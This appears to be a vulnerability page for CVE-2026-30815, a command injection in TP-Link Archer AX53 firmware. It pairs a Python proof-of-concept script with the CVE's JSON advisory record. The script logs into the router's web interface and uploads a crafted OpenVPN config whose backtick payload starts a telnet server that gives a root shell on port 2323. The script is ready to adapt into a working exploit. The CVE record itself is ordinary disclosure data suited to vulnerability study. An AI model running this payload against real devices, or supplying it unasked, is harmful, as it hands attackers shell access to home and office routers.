CVE-2026-30815

# Proof of Concept for CVE-2026-30815 # This script demonstrates the OS Command Injection via OpenVPN config upload. import requests # Target URL (Example endpoint structure) target_url = "http://192.168.0.1/cgi-bin/luci/;stok=<token>/admin/vpn/openvpn" # Attacker credentials (Authenticated Low Privileged User) username = "user" password = "user_password" # Login to get session token session = requests.Session() login_payload = {"luci_username": username, "luci_password": password} login_resp = session.post("http://192.168.0.1/cgi-bin/luci", data=login_payload) if login_resp.status_code == 200: print("[+] Login successful") # Malicious OpenVPN configuration file content # The payload injects a command to start a telnet server on port 2323 # This exploits the insufficient input validation in the config parser malicious_config = """ client dev tun proto tcp remote 127.0.0.1 1194 resolv-retry infinite nobind persist-key persist-tun ca ca.crt cert client.crt key client.key # Injection Payload: Using backticks to execute shell command ; `telnetd -l /bin/sh -p 2323` """ files = { 'file_upload': ('exploit.ovpn', malicious_config, 'application/octet-stream') } # Uploading the malicious configuration upload_resp = session.post(target_url, files=files) if upload_resp.status_code == 200: print("[+] Payload uploaded. Check if telnet is running on port 2323.") else: print("[-] Upload failed.") else: print("[-] Login failed.")

{"cve": {"id": "CVE-2026-30815", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-04-08T19:25:20.320", "lastModified": "2026-05-07T16:16:18.397", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS command injection vulnerability in the OpenVPN module\nof TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute system commands when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow modification of configuration files, disclosure of sensitive information, or further compromise of device integrity.\n\nThis issue affects AX53 v1.0: before 1.7.1 Build 20260213."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_ax53_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.1", "matchCriteriaId": "B096B7BB-7693-4C45-B5F7-8FD6E4969DCE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_ax53:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5F3EA1D9-EB47-4785-9CF0-F2B51945917D"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Third Party Advisory"]}, {"url": "https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5055/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2303", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2307", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2308", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2309", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}